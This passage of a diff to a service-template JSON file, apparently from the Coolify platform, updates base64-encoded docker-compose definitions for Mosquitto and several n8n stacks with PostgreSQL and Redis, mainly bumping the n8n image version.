"c2VydmljZXM6CiAgbW9zcXVpdHRvOgogICAgaW1hZ2U6IGVjbGlwc2UtbW9zcXVpdHRvCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9NT1NRVUlUVE9fMTg4MwogICAgICAtICdNUVRUX1VTRVJOQU1FPSR7U0VSVklDRV9VU0VSX01PU1FVSVRUT30nCiAgICAgIC0gJ01RVFRfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01PU1FVSVRUT30nCiAgICAgIC0gJ1JFUVVJUkVfQ0VSVElGSUNBVEU9JHtSRVFVSVJFX0NFUlRJRklDQVRFOi1mYWxzZX0nCiAgICAgIC0gJ0FMTE9XX0FOT05ZTU9VUz0ke0FMTE9XX0FOT05ZTU9VUzotdHJ1ZX0nCiAgICB2b2x1bWVzOgogICAgICAtICdtb3NxdWl0dG8tY29uZmlnOi9tb3NxdWl0dG8vY29uZmlnJwogICAgICAtICdtb3NxdWl0dG8tY2VydHM6L2NlcnRzJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdleGl0IDAnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudHJ5cG9pbnQ6ICJzaCAtYyBcIiBpZiBbICckUkVRVUlSRV9DRVJUSUZJQ0FURScgPSAndHJ1ZScgXTsgdGhlbiBlY2hvICdsaXN0ZW5lciA4ODgzJyA+IC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mICYmIGVjaG8gJ2NhZmlsZSAvY2VydHMvY2EuY3J0JyA+PiAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZiAmJiBlY2hvICdjZXJ0ZmlsZSAvY2VydHMvc2VydmVyLmNydCcgPj4gL21vc3F1aXR0by9jb25maWcvbW9zcXVpdHRvLmNvbmYgJiYgZWNobyAna2V5ZmlsZSAgL2NlcnRzL3NlcnZlci5rZXknID4+IC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mOyBlbHNlIGVjaG8gJ2xpc3RlbmVyIDE4ODMnID4gL21vc3F1aXR0by9jb25maWcvbW9zcXVpdHRvLmNvbmY7IGZpICYmIGVjaG8gJ3JlcXVpcmVfY2VydGlmaWNhdGUgJyRSRVFVSVJFX0NFUlRJRklDQVRFID4+IC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mICYmIGVjaG8gJ2FsbG93X2Fub255bW91cyAnJEFMTE9XX0FOT05ZTU9VUyA+PiAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZjsgaWYgWyAtbiAnJFNFUlZJQ0VfVVNFUl9NT1NRVUlUVE8nIF0gJiYgWyAtbiAnJFNFUlZJQ0VfUEFTU1dPUkRfTU9TUVVJVFRPJyBdOyB0aGVuIGVjaG8gJ3Bhc3N3b3JkX2ZpbGUgL21vc3F1aXR0by9jb25maWcvcGFzc3dvcmRzJyA+PiAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZiAmJiB0b3VjaCAvbW9zcXVpdHRvL2NvbmZpZy9wYXNzd29yZHMgJiYgY2htb2QgMDcwMCAvbW9zcXVpdHRvL2NvbmZpZy9wYXNzd29yZHMgJiYgY2hvd24gcm9vdDpyb290IC9tb3NxdWl0dG8vY29uZmlnL3Bhc3N3b3JkcyAmJiBtb3NxdWl0dG9fcGFzc3dkIC1iIC1jIC9tb3NxdWl0dG8vY29uZmlnL3Bhc3N3b3JkcyAkU0VSVklDRV9VU0VSX01PU1FVSVRUTyAkU0VSVklDRV9QQVNTV09SRF9NT1NRVUlUVE8gJiYgY2hvd24gbW9zcXVpdHRvOm1vc3F1aXR0byAvbW9zcXVpdHRvL2NvbmZpZy9wYXNzd29yZHM7IGZpICYmIGV4ZWMgbW9zcXVpdHRvIC1jIC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mIFwiIgogICAgbGFiZWxzOgogICAgICAtIHRyYWVmaWsudGNwLnJvdXRlcnMubXF0dC5lbnRyeXBvaW50cz1tcXR0CiAgICAgIC0gdHJhZWZpay50Y3Aucm91dGVycy5tcXR0cy5lbnRyeXBvaW50cz1tcXR0cwo=", "tags": [ "mosquitto", "mqtt", @@ -2603,7 +2603,7 @@ "n8n-with-postgres-and-worker": { "documentation": "https://n8n.io?utm_source=coolify.io", "slogan": "n8n is an extendable workflow automation tool with queue mode and workers.", - "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExNC40JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfTjhOXzU2NzgKICAgICAgLSAnTjhOX0VESVRPUl9CQVNFX1VSTD0ke1NFUlZJQ0VfVVJMX044Tn0nCiAgICAgIC0gJ1dFQkhPT0tfVVJMPSR7U0VSVklDRV9VUkxfTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX1VSTF9OOE59JwogICAgICAtICdHRU5FUklDX1RJTUVaT05FPSR7R0VORVJJQ19USU1FWk9ORTotRXVyb3BlL0Jlcmxpbn0nCiAgICAgIC0gJ1RaPSR7VFo6LUV1cm9wZS9CZXJsaW59JwogICAgICAtIERCX1RZUEU9cG9zdGdyZXNkYgogICAgICAtICdEQl9QT1NUR1JFU0RCX0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LW44bn0nCiAgICAgIC0gREJfUE9TVEdSRVNEQl9IT1NUPXBvc3RncmVzcWwKICAgICAgLSBEQl9QT1NUR1JFU0RCX1BPUlQ9NTQzMgogICAgICAtIERCX1BPU1RHUkVTREJfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gREJfUE9TVEdSRVNEQl9TQ0hFTUE9cHVibGljCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIEVYRUNVVElPTlNfTU9ERT1xdWV1ZQogICAgICAtIFFVRVVFX0JVTExfUkVESVNfSE9TVD1yZWRpcwogICAgICAtIFFVRVVFX0hFQUxUSF9DSEVDS19BQ1RJVkU9dHJ1ZQogICAgICAtICdOOE5fRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX0VOQ1JZUFRJT059JwogICAgICAtIE44Tl9SVU5ORVJTX0VOQUJMRUQ9dHJ1ZQogICAgICAtIE9GRkxPQURfTUFOVUFMX0VYRUNVVElPTlNfVE9fV09SS0VSUz10cnVlCiAgICAgIC0gJ044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU9JHtOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFOi10cnVlfScKICAgICAgLSAnTjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUz0ke044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M6LXRydWV9JwogICAgICAtICdOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TPSR7TjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9QUk9YWV9IT1BTPSR7TjhOX1BST1hZX0hPUFM6LTF9JwogICAgdm9sdW1lczoKICAgICAgLSAnbjhuLWRhdGE6L2hvbWUvbm9kZS8ubjhuJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXNxbDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo1Njc4LycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIG44bi13b3JrZXI6CiAgICBpbWFnZTogJ2RvY2tlci5uOG4uaW8vbjhuaW8vbjhuOjEuMTE0LjQnCiAgICBjb21tYW5kOiB3b3JrZXIKICAgIGVudmlyb25tZW50OgogICAgICAtICdHRU5FUklDX1RJTUVaT05FPSR7R0VORVJJQ19USU1FWk9ORTotRXVyb3BlL0Jlcmxpbn0nCiAgICAgIC0gJ1RaPSR7VFo6LUV1cm9wZS9CZXJsaW59JwogICAgICAtIERCX1RZUEU9cG9zdGdyZXNkYgogICAgICAtICdEQl9QT1NUR1JFU0RCX0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LW44bn0nCiAgICAgIC0gREJfUE9TVEdSRVNEQl9IT1NUPXBvc3RncmVzcWwKICAgICAgLSBEQl9QT1NUR1JFU0RCX1BPUlQ9NTQzMgogICAgICAtIERCX1BPU1RHUkVTREJfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gREJfUE9TVEdSRVNEQl9TQ0hFTUE9cHVibGljCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIEVYRUNVVElPTlNfTU9ERT1xdWV1ZQogICAgICAtIFFVRVVFX0JVTExfUkVESVNfSE9TVD1yZWRpcwogICAgICAtIFFVRVVFX0hFQUxUSF9DSEVDS19BQ1RJVkU9dHJ1ZQogICAgICAtICdOOE5fRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX0VOQ1JZUFRJT059JwogICAgICAtIE44Tl9SVU5ORVJTX0VOQUJMRUQ9dHJ1ZQogICAgICAtICdOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFPSR7TjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERTotdHJ1ZX0nCiAgICAgIC0gJ044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M9JHtOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TOi10cnVlfScKICAgICAgLSAnTjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUz0ke044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM6LXRydWV9JwogICAgICAtICdOOE5fUFJPWFlfSE9QUz0ke044Tl9QUk9YWV9IT1BTOi0xfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ244bi1kYXRhOi9ob21lL25vZGUvLm44bicKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6NTY3OC9oZWFsdGh6JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBuOG46CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcG9zdGdyZXNxbDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIHBvc3RncmVzcWw6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE2LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3Bvc3RncmVzcWwtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1NUR1JFU19VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo2LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3JlZGlzLWRhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gcmVkaXMtY2xpCiAgICAgICAgLSBwaW5nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAo=", + "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExOS4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfTjhOXzU2NzgKICAgICAgLSAnTjhOX0VESVRPUl9CQVNFX1VSTD0ke1NFUlZJQ0VfVVJMX044Tn0nCiAgICAgIC0gJ1dFQkhPT0tfVVJMPSR7U0VSVklDRV9VUkxfTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX1VSTF9OOE59JwogICAgICAtICdHRU5FUklDX1RJTUVaT05FPSR7R0VORVJJQ19USU1FWk9ORTotRXVyb3BlL0Jlcmxpbn0nCiAgICAgIC0gJ1RaPSR7VFo6LUV1cm9wZS9CZXJsaW59JwogICAgICAtIERCX1RZUEU9cG9zdGdyZXNkYgogICAgICAtICdEQl9QT1NUR1JFU0RCX0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LW44bn0nCiAgICAgIC0gREJfUE9TVEdSRVNEQl9IT1NUPXBvc3RncmVzcWwKICAgICAgLSBEQl9QT1NUR1JFU0RCX1BPUlQ9NTQzMgogICAgICAtIERCX1BPU1RHUkVTREJfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gREJfUE9TVEdSRVNEQl9TQ0hFTUE9cHVibGljCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIEVYRUNVVElPTlNfTU9ERT1xdWV1ZQogICAgICAtIFFVRVVFX0JVTExfUkVESVNfSE9TVD1yZWRpcwogICAgICAtIFFVRVVFX0hFQUxUSF9DSEVDS19BQ1RJVkU9dHJ1ZQogICAgICAtICdOOE5fRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX0VOQ1JZUFRJT059JwogICAgICAtIE44Tl9SVU5ORVJTX0VOQUJMRUQ9dHJ1ZQogICAgICAtIE9GRkxPQURfTUFOVUFMX0VYRUNVVElPTlNfVE9fV09SS0VSUz10cnVlCiAgICAgIC0gJ044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU9JHtOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFOi10cnVlfScKICAgICAgLSAnTjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUz0ke044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M6LXRydWV9JwogICAgICAtICdOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TPSR7TjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9QUk9YWV9IT1BTPSR7TjhOX1BST1hZX0hPUFM6LTF9JwogICAgdm9sdW1lczoKICAgICAgLSAnbjhuLWRhdGE6L2hvbWUvbm9kZS8ubjhuJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXNxbDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo1Njc4LycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIG44bi13b3JrZXI6CiAgICBpbWFnZTogJ2RvY2tlci5uOG4uaW8vbjhuaW8vbjhuOjEuMTE5LjInCiAgICBjb21tYW5kOiB3b3JrZXIKICAgIGVudmlyb25tZW50OgogICAgICAtICdHRU5FUklDX1RJTUVaT05FPSR7R0VORVJJQ19USU1FWk9ORTotRXVyb3BlL0Jlcmxpbn0nCiAgICAgIC0gJ1RaPSR7VFo6LUV1cm9wZS9CZXJsaW59JwogICAgICAtIERCX1RZUEU9cG9zdGdyZXNkYgogICAgICAtICdEQl9QT1NUR1JFU0RCX0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LW44bn0nCiAgICAgIC0gREJfUE9TVEdSRVNEQl9IT1NUPXBvc3RncmVzcWwKICAgICAgLSBEQl9QT1NUR1JFU0RCX1BPUlQ9NTQzMgogICAgICAtIERCX1BPU1RHUkVTREJfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gREJfUE9TVEdSRVNEQl9TQ0hFTUE9cHVibGljCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIEVYRUNVVElPTlNfTU9ERT1xdWV1ZQogICAgICAtIFFVRVVFX0JVTExfUkVESVNfSE9TVD1yZWRpcwogICAgICAtIFFVRVVFX0hFQUxUSF9DSEVDS19BQ1RJVkU9dHJ1ZQogICAgICAtICdOOE5fRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX0VOQ1JZUFRJT059JwogICAgICAtIE44Tl9SVU5ORVJTX0VOQUJMRUQ9dHJ1ZQogICAgICAtICdOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFPSR7TjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERTotdHJ1ZX0nCiAgICAgIC0gJ044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M9JHtOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TOi10cnVlfScKICAgICAgLSAnTjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUz0ke044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM6LXRydWV9JwogICAgICAtICdOOE5fUFJPWFlfSE9QUz0ke044Tl9QUk9YWV9IT1BTOi0xfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ244bi1kYXRhOi9ob21lL25vZGUvLm44bicKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6NTY3OC9oZWFsdGh6JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBuOG46CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcG9zdGdyZXNxbDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIHBvc3RncmVzcWw6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE2LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3Bvc3RncmVzcWwtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1NUR1JFU19VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo2LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3JlZGlzLWRhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gcmVkaXMtY2xpCiAgICAgICAgLSBwaW5nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAo=", "tags": [ "n8n", "workflow", @@ -2624,7 +2624,7 @@ "n8n-with-postgresql": { "documentation": "https://n8n.io?utm_source=coolify.io", "slogan": "n8n is an extendable workflow automation tool.", - "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExNC40JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfTjhOXzU2NzgKICAgICAgLSAnTjhOX0VESVRPUl9CQVNFX1VSTD0ke1NFUlZJQ0VfVVJMX044Tn0nCiAgICAgIC0gJ1dFQkhPT0tfVVJMPSR7U0VSVklDRV9VUkxfTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX1VSTF9OOE59JwogICAgICAtICdHRU5FUklDX1RJTUVaT05FPSR7R0VORVJJQ19USU1FWk9ORTotRXVyb3BlL0Jlcmxpbn0nCiAgICAgIC0gJ1RaPSR7VFo6LUV1cm9wZS9CZXJsaW59JwogICAgICAtIERCX1RZUEU9cG9zdGdyZXNkYgogICAgICAtICdEQl9QT1NUR1JFU0RCX0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LW44bn0nCiAgICAgIC0gREJfUE9TVEdSRVNEQl9IT1NUPXBvc3RncmVzcWwKICAgICAgLSBEQl9QT1NUR1JFU0RCX1BPUlQ9NTQzMgogICAgICAtIERCX1BPU1RHUkVTREJfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gREJfUE9TVEdSRVNEQl9TQ0hFTUE9cHVibGljCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdOOE5fUlVOTkVSU19FTkFCTEVEPSR7TjhOX1JVTk5FUlNfRU5BQkxFRDotdHJ1ZX0nCiAgICAgIC0gJ044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU9JHtOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFOi10cnVlfScKICAgICAgLSAnTjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUz0ke044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M6LXRydWV9JwogICAgICAtICdOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TPSR7TjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9QUk9YWV9IT1BTPSR7TjhOX1BST1hZX0hPUFM6LTF9JwogICAgdm9sdW1lczoKICAgICAgLSAnbjhuLWRhdGE6L2hvbWUvbm9kZS8ubjhuJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXNxbDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo1Njc4LycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHBvc3RncmVzcWw6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE2LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3Bvc3RncmVzcWwtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1NUR1JFU19VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", + "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExOS4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfTjhOXzU2NzgKICAgICAgLSAnTjhOX0VESVRPUl9CQVNFX1VSTD0ke1NFUlZJQ0VfVVJMX044Tn0nCiAgICAgIC0gJ1dFQkhPT0tfVVJMPSR7U0VSVklDRV9VUkxfTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX1VSTF9OOE59JwogICAgICAtICdHRU5FUklDX1RJTUVaT05FPSR7R0VORVJJQ19USU1FWk9ORTotRXVyb3BlL0Jlcmxpbn0nCiAgICAgIC0gJ1RaPSR7VFo6LUV1cm9wZS9CZXJsaW59JwogICAgICAtIERCX1RZUEU9cG9zdGdyZXNkYgogICAgICAtICdEQl9QT1NUR1JFU0RCX0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LW44bn0nCiAgICAgIC0gREJfUE9TVEdSRVNEQl9IT1NUPXBvc3RncmVzcWwKICAgICAgLSBEQl9QT1NUR1JFU0RCX1BPUlQ9NTQzMgogICAgICAtIERCX1BPU1RHUkVTREJfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gREJfUE9TVEdSRVNEQl9TQ0hFTUE9cHVibGljCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdOOE5fUlVOTkVSU19FTkFCTEVEPSR7TjhOX1JVTk5FUlNfRU5BQkxFRDotdHJ1ZX0nCiAgICAgIC0gJ044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU9JHtOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFOi10cnVlfScKICAgICAgLSAnTjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUz0ke044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M6LXRydWV9JwogICAgICAtICdOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TPSR7TjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9QUk9YWV9IT1BTPSR7TjhOX1BST1hZX0hPUFM6LTF9JwogICAgdm9sdW1lczoKICAgICAgLSAnbjhuLWRhdGE6L2hvbWUvbm9kZS8ubjhuJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXNxbDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo1Njc4LycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHBvc3RncmVzcWw6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE2LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3Bvc3RncmVzcWwtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1NUR1JFU19VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICA